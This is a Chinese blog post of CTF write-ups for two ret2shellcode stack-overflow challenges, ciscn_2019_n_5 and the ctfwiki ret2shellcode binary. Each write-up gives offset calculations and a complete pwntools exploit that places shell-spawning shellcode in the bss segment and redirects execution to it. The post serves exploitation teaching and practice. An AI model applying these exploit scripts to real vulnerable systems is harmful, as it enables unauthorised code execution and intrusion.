ret2shellcode

最新推荐文章于 2022-06-28 21:33:02 发布
最新推荐文章于 2022-06-28 21:33:02 发布
阅读量140 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/113553237
版权
1. buuoj—ciscn_2019_n_5(64位)
  1. 查看保护,没有开启NX,RELOAD也没有完全开启

在这里插入图片描述

  1. shellcode 的存储地址

    在这里插入图片描述

    • 首先读入name,这里可以作为shellcode 的地址,其次gets() 函数,在获取gets 时存在栈溢出

    • name在bss 段的位置

      在这里插入图片描述

  2. exp

    from pwn import *

p = process('./ciscn_2019_n_5')
elf = ELF('./ciscn_2019_n_5')
context.log_level = 'debug'
context.arch = elf.arch
#step 1 在bss段写入shellcode
name_bss = 0x601080
payload1 = asm(shellcraft.sh())
p.sendlineafter('tell me your name\n',payload1)
#step 2 在函数栈溢出执行,bss段的shellcode
payload2 = b'a'*0x28 + p64(name_bss)
p.sendlineafter('What do you want to say to me?\n',payload2)

p.interactive()
2. ctfwiki-ret2shellcode(32位)

  1. 查看保护,没有开NX以及RELOAD

  2. shellcode 的存储地址

    在这里插入图片描述

  • 首先,gets函数存在栈溢出,其次strncpy将s的前64字节复制到buf的bss段,可以在s的前64字节构造shellcode,再通过s溢出到buf2的bss所在地址

  • buf2所在的bss地址

    在这里插入图片描述

  • 计算s距离ebp的偏移量

    • 将断点打在gets函数上

      在这里插入图片描述
      在这里插入图片描述

    • 上图可知,ebp与esp直接的距离为0x88,又s距离esp0x1c,故s距离ebp0x6c,加上ebp本身4字节,所以padding长度为0x70

  1. exp

    from pwn import *
p = process('./ret2shellcode')
elf = ELF('./ret2shellcode')
context.log_level = 'debug'
context.arch = elf.arch

bss = 0x804a080
#step 1 
payload = asm(shellcraft.i386.sh()) 
#step 2
payload = payload.ljust(112,b'a') + p32(bss)
print("payload_len=="+str(hex(len(payload))))
p.sendlineafter('No system for you this time !!!\n',payload)
p.interactive()
huzai9527
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf wustctf2020_getshell_2 ret2shellcode
weixin_45441024的博客
12-01 630
BUUCTF wustctf2020_getshell_2 check一下,32位的程序且没有开任何保护 用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节 这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe
Ret2ShellCode
钞sir的博客
01-24 8180
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode是栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
ret2libc exploit
07-07
ret2libc攻击的核心思想在于利用库函数(通常来自libc库)而不是自定义的shellcode。这是因为libc库中的函数本身是可执行的,并且通常拥有足够的权限来执行危险的操作。通过将返回地址指向libc中的某个函数,攻击者...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
**ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式特别适用于那些具有非可执行堆栈的系统,这类系统的防御机制通常会阻止...
Lab2-Return-To-Libc
11-10
Return-to-libc攻击是缓冲区溢出攻击的一种变种,它不依赖于执行已知的shellcode,而是利用程序库函数(如libc)中的现有代码来执行攻击者想要的操作。这种方法的优势在于,即使在DEP开启的情况下,由于系统函数通常...
shellcode简单例子
10-28
2. **构造溢出数据**:构造一段包含shellcode的数据,并填充到足够的长度以覆盖返回地址。 3. **触发漏洞**:通过某种方式触发漏洞,使得程序跳转到shellcode所在的地址。 4. **执行shellcode**:shellcode被加载到...
Delphi编写ShellCode的示例
02-22
$C3, // ret // ShellCode Args $43, $6d, $64, $2e, $65, $78, $65, $00, // "cmd.exe" $00, $00, $00, $00, $00, $00, $00, $00, // null-terminated $00, $00, $00, $00, $00, $00, $00, $00, // empty ...
带exp的pwn测试文件
09-12
这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc、ret2csu、stack_pivoting、stack_smash以及SROP(Secure Return Oriented Programming)和frame_faking。下面将详细介绍...
Writing JIT-Spray Shellcode for fun and profit
06-19
在这种情况下,仅剩的方法就是ret2libc攻击了。具体来说,我们可以先通过调用`VirtualAlloc()`分配一段内存区域,然后使用`memcpy()`将shellcode拷贝到这块新分配的内存中,最后返回到这片内存区执行shellcode。不过...
Win 7下定位kernel32.dll基址及shellcode编写1
08-03
Ret ``` 这个新方法可以跨版本地在32位的Windows 5.0到7.0中工作,确保了shellcode的兼容性。 shellcode是直接在内存中执行的代码,通常用于执行特定任务,如启动计算器程序(calc.exe)。在Windows 7中,可以...
L9-3-2021必做-overflow-to-shellcode1
08-03
在32位Linux系统中,可能需要找到不使用`ret`指令的Shellcode,因为`ret`可能已经被溢出的数据覆盖。编写或找到合适的Shellcode后,调整输入数据,使其在溢出后恰好定位到Shellcode的起始位置。 6. **exploit开发**...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 ...返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
PWN --- ret2shellcode
qq_41696518的博客
06-28 879
PWN ret2shellcode
[二进制安全学习]ret2shellcode
Y4tacker的博客
07-15 1141
文章目录写在前面ret2shellcode利用原理利用关键例题参考文章 写在前面 懒狗的第二篇学习,开冲 ret2shellcode 利用原理 ret2shellcode,即控制程序执行 shellcode 代码。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码。 在栈溢出的基础上,要想执行 shellcode,需要对应的 binary 在运行时,shellcode 所在的区域具有可执行权限。 利用关键 1、程序存在溢出,并且还要能够控
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值